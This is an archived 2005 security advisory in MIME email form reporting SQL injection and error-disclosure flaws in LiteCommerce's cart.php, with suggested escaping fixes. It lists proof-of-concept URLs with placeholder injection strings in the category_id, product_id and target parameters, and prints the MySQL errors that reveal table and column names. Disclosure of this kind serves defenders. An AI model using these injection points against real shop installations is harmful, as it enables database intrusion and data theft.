litecommerceSQL.txt

`This is a multi-part message in MIME format.  
  
------=_NextPart_000_0005_01C53B05.B7FB4460  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
Dcrab 's Security Advisory  
[Hsc Security Group] http://www.hackerscenter.com/  
[dP Security] http://digitalparadox.org/  
  
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. =  
Learn more at http://www.digitalparadox.org/services.ah  
  
Severity: High  
Title: LiteCommerce Sql injection and reveling errors vulnerability  
Date: 07/04/2005  
  
Vendor: LiteCommerce  
Vendor Website: http://www.litecommerce.com  
Summary: LiteCommerce Sql injection and reveling errors vulnerability  
  
Proof of Concept Exploits:=20  
  
http://localhost/test/cart.php?target=3D'PHP_SCRIPT_EXPOSUREPHP_SCRIPT_EX=  
POSURE  
  
  
http://localhost/test/cart.php?target=3Dcategory&category_id=3D'SQL_INJEC=  
TION  
SQL INJECTION  
  
1064: You have an error in your SQL syntax. Check the manual that =  
corresponds to your MySQL server version for the right syntax to use =  
near 'SQL_INJECTION' AND 1 ORDER BY order_by, name' at line 1 in SELECT =  
category_id,image_width,image_height,name,description,meta_tags,enable =  
d,views_stats,order_by,membership,threshold_bestsellers,parent,image_t =  
ype FROM xlite_categories WHERE parent=3D''SQL_INJECTION' AND 1 ORDER BY =  
order_by, name  
This reveals coloumn, table information thus is very high risk and easy =  
to exploit  
  
  
http://localhost/test/cart.php?target=3Dproduct&product_id=3D'SQL_INJECTI=  
ON&category_id=3D246  
SQL INJECTION  
1064: You have an error in your SQL syntax. Check the manual that =  
corresponds to your MySQL server version for the right syntax to use =  
near 'SQL_INJECTION' AND enabled=3D1' at line 1 in SELECT =  
inventory_id,amount,low_avail_limit,enabled,order_by FROM =  
xlite_inventories WHERE inventory_id=3D''SQL_INJECTION' AND enabled=3D1  
  
  
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), =  
mysql_real_escape_string() and other functions for input validation =  
before passing user input to the mysql database, or before echoing data =  
on the screen, would solve these problems.  
  
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah  
  
Author:=20  
These vulnerabilties have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for =  
my soon to come out book on Secure coding with php.  
  
  
  
------=_NextPart_000_0005_01C53B05.B7FB4460  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc =  
Security Group]=20  
<A =  
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=  
BR>[dP=20  
Security] <A=20  
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A></FONT>=  
</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =  
servers,=20  
scripts, networks, etc. Learn more at <A=20  
href=3D"http://www.digitalparadox.org/services.ah">http://www.digitalpara=  
dox.org/services.ah</A></FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: LiteCommerce =  
Sql injection=20  
and reveling errors vulnerability<BR>Date: 07/04/2005</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Vendor: LiteCommerce<BR>Vendor Website: =  
<A=20  
href=3D"http://www.litecommerce.com">http://www.litecommerce.com</A><BR>S=  
ummary:=20  
LiteCommerce Sql injection and reveling errors =  
vulnerability</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits: =  
</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2><A=20  
href=3D"http://localhost/test/cart.php?target=3D'PHP_SCRIPT_EXPOSUREPHP_S=  
CRIPT_EXPOSURE">http://localhost/test/cart.php?target=3D'PHP_SCRIPT_EXPOS=  
UREPHP_SCRIPT_EXPOSURE</A></FONT></DIV>  
<DIV>&nbsp;</DIV><FONT face=3DArial size=3D2>  
<DIV><BR><A=20  
href=3D"http://localhost/test/cart.php?target=3Dcategory&category_id=3D=  
'SQL_INJECTION">http://localhost/test/cart.php?target=3Dcategory&cate=  
gory_id=3D'SQL_INJECTION</A><BR>SQL=20  
INJECTION</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>1064: You have an error in your SQL syntax. Check the manual that=20  
corresponds to your MySQL server version for the right syntax to use =  
near=20  
'SQL_INJECTION' AND 1 ORDER BY order_by, name' at line 1 in SELECT=20  
category_id,image_width,image_height,name,description,meta_tags,enable=20  
d,views_stats,order_by,membership,threshold_bestsellers,parent,image_t =  
ype FROM=20  
xlite_categories WHERE parent=3D''SQL_INJECTION' AND 1 ORDER BY =  
order_by,=20  
name<BR>This reveals coloumn, table information thus is very high risk =  
and easy=20  
to exploit</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/test/cart.php?target=3Dproduct&product_id=3D=  
'SQL_INJECTION&category_id=3D246">http://localhost/test/cart.php?targ=  
et=3Dproduct&product_id=3D'SQL_INJECTION&category_id=3D246</A><BR=  
>SQL=20  
INJECTION<BR>&nbsp;1064: You have an error in your SQL syntax. Check the =  
manual=20  
that corresponds to your MySQL server version for the right syntax to =  
use near=20  
'SQL_INJECTION' AND enabled=3D1' at line 1 in SELECT=20  
inventory_id,amount,low_avail_limit,enabled,order_by FROM =  
xlite_inventories=20  
WHERE inventory_id=3D''SQL_INJECTION' AND enabled=3D1</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(),=20  
mysql_escape_string(), mysql_real_escape_string() and other functions =  
for input=20  
validation before passing user input to the mysql database, or before =  
echoing=20  
data on the screen, would solve these problems.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Keep your self updated, Rss feed at: <A=20  
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=  
h</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Author: <BR>These vulnerabilties have been found and released by =  
Diabolic=20  
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =  
free to=20  
contact me regarding these vulnerabilities. You can find me at, <A=20  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =  
or <A=20  
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A>. =  
Lookout for my=20  
soon to come out book on Secure coding with php.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV></FONT>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV></BODY></HTML>  
  
------=_NextPart_000_0005_01C53B05.B7FB4460--  
`